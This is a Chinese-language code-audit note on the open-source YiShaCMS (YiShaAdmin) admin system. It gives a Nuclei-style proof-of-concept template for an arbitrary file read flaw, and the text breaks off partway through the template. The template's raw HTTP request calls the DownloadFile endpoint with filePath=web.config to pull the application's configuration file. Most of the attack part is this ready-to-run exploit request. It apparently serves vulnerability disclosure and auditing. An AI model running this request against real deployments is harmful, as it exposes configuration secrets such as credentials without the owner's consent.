YiShaCMS 代码审计记录

0x01 开源地址： https://github.com/liukuo362573/YiShaAdmin 总计star超过1.7k 系统占比： POC： 漏洞1: 任意文件读取： ● LFI id: YiShaCMS_LFI info: name: YiShaCMS_LFI author: loecho severity: medium description: description reference: https://1oecho.github.io tags: lfi requests: raw: |+ GET /File/DownloadFile?filePath=web.config&delete=0 HTTP/1.1 Host: {{Hostname}} Accept: / DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.48...